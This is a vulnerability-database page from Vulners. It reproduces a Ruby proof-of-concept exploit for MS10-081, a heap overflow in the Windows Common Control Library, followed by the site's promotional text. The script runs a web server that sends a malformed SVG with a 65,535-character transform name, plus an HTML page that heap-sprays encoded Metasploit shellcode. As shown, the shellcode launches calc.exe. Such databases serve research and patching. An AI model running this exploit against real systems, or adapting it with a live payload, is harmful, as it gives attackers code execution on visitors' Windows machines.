Vulners
Lucene search
MS10-081: Windows Common Control Library (Comctl32) Heap Overflow
#!/usr/bin/env ruby
# http://breakingpointsystems.com/community/blog/microsoft-vulnerability-proof-of-concept
# Nephi Johnson
require 'socket'
def http_send(sock, data, opts={})
defaults = {:code=>"200", :message=>"OK", :type=>"text/html", :desc=>"content"}
opts = defaults.merge(opts)
code = opts[:code]
message = opts[:message]
type = opts[:type]
date_str = Time.now.gmtime.strftime("%a, %d %b %Y %H:%M:%S GMT")
headers = "HTTP/1.1 #{code} #{message}\r\n" +
"Date: #{date_str}\r\n" +
"Content-Length: #{data.length}\r\n" +
"Content-Type: #{type}\r\n\r\n"
puts "[+] Sending #{opts[:desc]}"
sock.write(headers + data) rescue return false
return true
end
def sock_read(sock, out_str, timeout=5)
begin
if Kernel.select([sock],[],[],timeout)
out_str.replace(sock.recv(1024))
puts "[+] Received:"
puts " " + out_str.split("\n")[0]
return true
else
sock.close
return false
end
rescue Exception => ex
return false
end
end
port = ARGV[0] || 55555
transform_name = "\x21" * 65535
svg = <<-SVG
<?xml version="1.0"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink">
<rect x="50" y="50" height="110" width="110"
style="fill: #ffffff"
transform="#{transform_name}(10) translate(30) rotate(45 50 50)"
>
</rect>
<text x="100" y="100">CLICK ME</text>
</svg>
SVG
html = <<-HTML
<html>
<body>
<script>
<!--
function str_dup(str, length) {
var result = str;
while(result.length < length) {
result += result;
}
return result.substr(result.length - length);
}
var shellcode = unescape("%u9000%u9090%u9090") +
// msfpayload windows/exec CMD=calc.exe R | msfencode -t js_le -b "\x00"
unescape("%u39ba%ue680%udb4f%u29dc%ub1c9%ud933%u2474%u58f4" +
"%u5031%u8313%u04c0%u5003%u6236%ub313%ueba0%u4cdc" +
"%u8c30%ua955%u9e01%ub902%u2e33%uef40%uc5bf%u0404" +
"%uab34%u2b80%u06fd%u02f7%ua6fe%uc837%ua83c%u13cb" +
"%u0a10%udbf5%u4b65%u0132%u1985%u4deb%u8e37%u1098" +
"%uaf8b%u1f4e%ud7b3%ue0eb%u6247%u30f5%uf9f7%ua8bd" +
"%ua57c%uc81d%ub551%u8362%u0ede%u1210%u5f36%u24d9" +
"%u0c76%u88e4%u4c7b%u2e20%u3b63%u4c5a%u3c1e%u2e99" +
"%uc9c4%u883c%u6a8f%u28e5%uec5c%u266e%u7a29%u2b28" +
"%uafac%u5742%u4e25%ud185%u757d%ub901%u1426%u6710" +
"%u2989%ucf42%u8c76%ue208%ub663%u6952%u3a72%ud4e9" +
"%u4474%u76f2%u751c%u1979%u8a5b%u5da8%uc093%uf4f1" +
"%u8d3b%u4563%u2e26%u8a5e%uad5e%u736b%uada5%u7619" +
"%u69e2%u0af1%u1c7b%ub9f5%u357c%u5c96%ud5ee%ufa77" +
"%u7c96%u0e88");
var base = str_dup(unescape("%u2100"), 0x800 - shellcode.length);
var arr = [];
for(var i = 0; i < 2000; i++) {
arr[i] = document.createElement("a");
arr[i].innerHTML = [base + shellcode].join("");
}
-->
</script>
<iframe width="100%" height="100%" src="poc.svg" marginheight="0" marginwidth="0"></iframe>
</body>
</html>
HTML
puts "[+] Listening on port #{port}"
puts
TCPServer.open(port) do |srv|
while true
cli = srv.accept
req = ""
next unless sock_read(cli, req, 5)
while req.length > 0
if req =~ /GET.*svg/i
break unless http_send(cli, svg, :type=>"image/svg+xml", :desc=>"svg")
elsif req =~ /QUIT/
exit()
else
break unless http_send(cli, html, :type=>"text/html", :desc=>"html")
end
req = ""
next unless sock_read(cli, req, 5)
end
cli.close rescue next
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Jan 2011 00:00Current
7.1High risk
Vulners AI Score7.1